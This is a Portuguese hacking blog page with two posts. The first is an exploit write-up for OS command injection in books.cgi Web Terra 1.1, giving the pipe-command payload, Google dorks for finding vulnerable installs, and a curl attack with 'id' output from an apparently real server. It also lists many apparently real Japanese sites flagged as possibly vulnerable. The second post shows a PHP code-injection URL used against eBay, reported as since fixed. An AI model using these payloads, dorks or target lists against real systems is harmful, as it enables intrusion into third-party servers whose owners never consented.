Parceiro: Camisetas Hacker

Camisetas para Nerds & Hackers

Mostrando postagens com marcador Remote Code Execution. Mostrar todas as postagens
Mostrando postagens com marcador Remote Code Execution. Mostrar todas as postagens

quinta-feira, 5 de junho de 2014

Executar comandos remotamente via books.cgi Web Terra v. 1.1



Executar comandos remotamente via books.cgi Web Terra v. 1.1

[+] Remote Comand Execution on books.cgi Web Terra v. 1.1
[+] Date: 21/05/2014
[+] CWE number: CWE-78
[+] Risk: High
[+] Author: Felipe Andrian Peixoto
[+] Contact: [email protected]
[+] Tested on: Windows 7 and Linux
[+] Vendor Homepage: http://www2.inforyoma.or.jp/~terra
[+] Vulnerable File: books.cgi
[+] Version : 1.1
[+] Exploit: http://host/patch/books.cgi?file=|COMANDO|

CGI é um acrónimo para a expressão inglesa Common Gateway Interface. Consiste numa importante tecnologia que permite gerar páginas dinâmicas, permitindo a um navegador passar parâmetros para um programa alojado num servidor web. Assim, designam-se por scripts CGI os pequenos programas que interpretam esses parâmetros e geram a página depois de os processar.O CGI foi concebido como o culminar de discussões por especialistas durante os primórdios da Internet, nomeadamente entre Rob McCool, John Franks, Ari Luotonen, George Phillips e Tony Sanders. DEmbora a linguagem tipicamente associada aos CGI seja o Perl, o CGI foi concebido de forma a ser independente da linguagem utilizada. Actualmente tecnologias como ASP.NET, PHP, Python e Ruby continuam a utilizar a especificação.


/DORK's: 
------------------------------------------------------------------------------------------
inurl:*"/books.cgi?file=*"
inurl:"/books.cgi?file="
inurl:"/books/" ext:cgi inurl:"books.cgi" "book1.txt" 
------------------------------------------------------------------------------------------  

Exemplo de achados:
http://www.hi-ho.ne.jp/cgi-bin/user/yyama/books.cgi?file=interbook.txt&subject=%E5%A5%AA%E6%8F%83%E9%81%9C%E5%A5%AA%E8%B6%B3%E6%9D%9F%E5%A5%AA%E7%AA%B6%E8%AC%82&start=2910
www.hi-ho.ne.jp/cgi-bin/user/yyama/books.cgi?file...txt...
http://ffg.sakura.ne.jp/ffg/book/081_120/books.cgi?file=book100.cgi&subject=%E7%AB%AA%5B%EF%BE%85%F3%BE%AC%9C&start=0
http://cgi.members.interq.or.jp/rabbit/hirotti/book/books.cgi?file=book13.txt&subject=%82%A4%82%E9%90%AF%81%7B%8C%A2%96%E9%8D%B3&start=240
http://nocturne.staba.jp/books/books.cgi?file=book2.txt&subject=%83V%83%8A%83A%83X%83X%83g%81%5B%83%8A%81%5B&start=19160
http://cgi.din.or.jp/~ah-san/books/books.cgi?file=book4.txt&subject=%82%B1%82%B1%82%EB%96%CD%97l&start=140

Comando CURL:
OS Command ('OS Command Injection')

 curl  -v 'http://redsuns.x0.com/webnovel/books.cgi?file=|id|'


0xResultado:

uid=1085(spider) gid=1000(users) groups=1000(users)
 curl  -v 'http://redsuns.x0.com/webnovel/books.cgi?file=|id|' * About to connect() to redsuns.x0.com port 80 (#0) *   Trying 210.188.227.146... * connected * Connected to redsuns.x0.com (210.188.227.146) port 80 (#0) > GET /webnovel/books.cgi?file=|id| HTTP/1.1 > User-Agent: curl/7.26.0 > Host: redsuns.x0.com > Accept: */* >  * additional stuff not fine transfer.c:1037: 0 0 * HTTP 1.1 or later with persistent connection, pipelining supported < HTTP/1.1 200 OK < Via: 1.1 IRAQUE < Connection: Keep-Alive < Proxy-Connection: Keep-Alive < Transfer-Encoding: chunked < Date: Thu, 05 Jun 2014 16:44:24 GMT < Content-Type: text/html < Server: Apache/1.3.42 (Unix)

Usando [ SCANNER INURL ]
Usando [ SCANNER INURL ]

DEBUG:
Array
(
    [0] => Array
        (
        )

    [host] => www.google.com.br
    [dork] => inurl%3A%22%2Fbooks%2F%22+ext%3Acgi+inurl%3A%22books.cgi%22+%22book1.txt%22
    [arquivo] => resultados.txt
    [tipoerro] => 2
    [exploit] =>
    [achar] => 'a href=book'
    [cmd] => nmap -sV -p 80,8080,21,22,3306 _ALVO_
    [ipProxy] =>
    [porta] =>
    [url] => /search?q=inurl%3A%22%2Fbooks%2F%22+ext%3Acgi+inurl%3A%22books.cgi%22+%22book1.txt%22&num=1900&btnG=Search
    [port] => 80
)



0xRESULTADO::

TOTAL DE URL's: 71
EXPLOIT USADO:
DORK: inurl%3A%22%2Fbooks%2F%22+ext%3Acgi+inurl%3A%22books.cgi%22+%22book1.txt%22
TOTAL DE POSSÍVEIS VULL: 19
ARQUIVO COM RESULTADO:resultados.txt
LISTA:

http://webcache.googleusercontent.com/search?q=cache:ovc5k7pkIrwJ:http://www2.pos.to/~fuyumi/tomonokai/cgi-bin/books.cgi?file%3Dbook1.txt%26subject%3D%26start%3D579%2Binurl:%22/books/%22+ext:cgi+inurl:%22books.cgi%22+%22book1.txt%22&num=1900&hl=pt-BR&&ct=clnk
http://ted.pekori.to/bbs/books/books.cgi?file=book1.txt&subject=%83%8A%83%8C%81%5B%8F%AC%90%E0%81E%96l%82%E7%82%CCPBM%94%92%8F%91&start=40
http://webcache.googleusercontent.com/search?q=cache:a2iYNKIzSvUJ:http://ted.pekori.to/bbs/books/books.cgi?file%3Dbook1.txt%26subject%3D%2583%258A%2583%258C%2581%255B%258F%25AC%2590%25E0%2581E%2596l%2582%25E7%2582%25CCPBM%2594%2592%258F%2591%26start%3D40%2Binurl:%22/books/%22+ext:cgi+inurl:%22books.cgi%22+%22book1.txt%22&num=1900&hl=pt-BR&&ct=clnk
http://cgi.din.or.jp/~ah-san/books/books.cgi?file=book1.txt&subject=%96%BC%92T%92%E3%96%B6%93%87%8C%DC%98Y&start=820
http://cgi.din.or.jp/~ah-san/books/books.cgi?file=book1.txt&subject=%96%BC%92T%92%E3%96%B6%93%87%8C%DC%98Y&start=280
http://cgi.din.or.jp/~ah-san/books/books.cgi?file=book1.txt&subject=%96%BC%92T%92%E3%96%B6%93%87%8C%DC%98Y&start=240
http://cgi.din.or.jp/~ah-san/books/books.cgi?file=book1.txt&subject=%96%BC%92T%92%E3%96%B6%93%87%8C%DC%98Y&start=840
http://cgi.din.or.jp/~ah-san/books/books.cgi?file=book1.txt&subject=%96%BC%92T%92%E3%96%B6%93%87%8C%DC%98Y&start=420
http://cgi.din.or.jp/~ah-san/books/books.cgi?file=book1.txt&subject=%E8%5E%8F%8F%90%5C%E8%5E%BDT%E8%5E%8F%83%96%8B%FA%AC%5C%E8%5E%8F%8F%90%5C%DC%98Y&start=100
http://taicho.oops.jp/cgi-bin/books/books.cgi?file=book1.txt&subject=Nature%81%40in%81%40Blood1&start=1120
http://taicho.oops.jp/cgi-bin/books/books.cgi?file=book1.txt&subject=Nature%81%40in%81%40Blood1&start=1020
http://www.wao.or.jp/user/take123/books/books.cgi?file=book1.txt&subject=%96%BC%92T%92%E3%83R%83%8D%83%93
http://www.scorpion.ne.jp/~kaimu/cgi-bin/books.cgi?file=book1.txt&subject=%8C%8E%82%CC%8D%CA
http://www6.airnet.ne.jp/tangent/novel/books.cgi?file=book1.txt&subject=%8AC%94n%8F%B2%82%CC%8E%96%8C%8F%95%EB
http://www.kcn.ne.jp/cgi-bin/blue/books.cgi?file=book1.txt&subject=%A5%B3%A1%BC%A5%B8
http://hccweb1.bai.ne.jp/~apaaf603/main/books/books.cgi?file=book1.txt&subject=%96%BC%92T%92%E3%82%A0%82%AE%82%E9
http://mbl.myftp.biz/~sgon/tryhp/books1/books.cgi?file=book1.txt&subject=%96%BC%92T%92%E3%93c%8C%E1%8D%EC
http://taicho.oops.jp/cgi-bin/books/books.cgi?file=book1.txt&subject=Nature%81%40in%81%40Blood1&start=1240
http://www.gifunisi.jp/cgi/books/books.cgi?file=book1.txt&subject=%96%BC%92T%92%E3%8F%BC%93c%97D%8D%EC

SCRIPT INURL
http://pastebin.com/TzijC99y
Mais informações sobre falhas desse tipo:
http://cwe.mitre.org/data/definitions/78.html
EXPLOIT:
http://www.exploit-db.com/exploits/33494/
Ref:
http://thobias.org/doc/cgi_shell.html

domingo, 15 de dezembro de 2013

Hacker demonstra "execução remota de código PHP" vulnerabilidade no site EBay.


Remote Code Execution EBay
Hacker demonstra "execução remota de código PHP" vulnerabilidade no site EBay.


Hacker demonstra "execução remota de código PHP" vulnerabilidade no site EBay.

Em um vídeo de demonstração, ele explorou a falha RCE no site eBay, e conseguiu exibir a saída da function nativa do php  phpinfo(), apenas modificando a URL e injetar código.

[URL - ALVO ] https://sea.ebay.com/search/?q=david&catidd=1 

Agora injetando o PHP.
[URL - MODIFICADA] https://sea.ebay.com/search/?q[0]=david&q[1]=sec{${phpinfo()}}&catidd=1


Essa execução só é possível se a página de 'pesquisa' está recebendo "q" valor do parâmetro usando alguma função LOOP como "foreach ()". Muito provavelmente código no final do servidor deve ser algo como:

//php
foreach($_GET['q'] as $dados)
{
 if $dados com sucesso é capaz de ignorar algumas funções de filtro de entrada
{
eval("executar algo aqui  $dados");
}
}
//php

Vídeo:
OBS: A falha já foi corrigida.
Fonte:thehackernews.